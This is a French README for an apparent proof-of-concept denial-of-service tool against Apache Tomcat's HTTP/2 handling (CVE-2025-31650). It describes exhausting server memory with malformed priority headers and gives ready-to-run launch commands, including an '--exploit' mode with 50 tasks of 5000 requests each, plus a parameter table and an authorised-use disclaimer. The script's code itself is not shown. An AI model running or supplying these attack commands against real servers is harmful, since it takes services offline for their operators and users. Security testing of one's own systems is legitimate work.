
PoC pour CVE-2025-31650
🚨 Preuve de concept (PoC) pour la vulnérabilité DoS HTTP/2 d'Apache Tomcat (CVE-2025-31650)
Ce script provoque une condition d'épuisement de la mémoire dans Apache Tomcat en envoyant des en-têtes priority malformés via HTTP/2.
Server (détection Tomcat)--check-only (non intrusif)python3 tomcatkiller.py --target https://example.com:8443 --check-only
python3 tomcatkiller.py --target https://example.com:8443 --exploit --tasks 50 --requests 5000
| Paramètre | Description |
|---|---|
--target | URL cible complète avec protocole et port |
--check-only | Teste uniquement si le serveur supporte HTTP/2 & Tomcat |
--exploit | Lance l'attaque DoS réelle |
--tasks | Nombre de tâches asynchrones (par défaut : 50) |
--requests | Requêtes par tâche (par défaut : 5000) |
Ce PoC est destiné uniquement aux tests de sécurité éducatifs et autorisés.
Ne pas l'utiliser contre des systèmes sans autorisation explicite.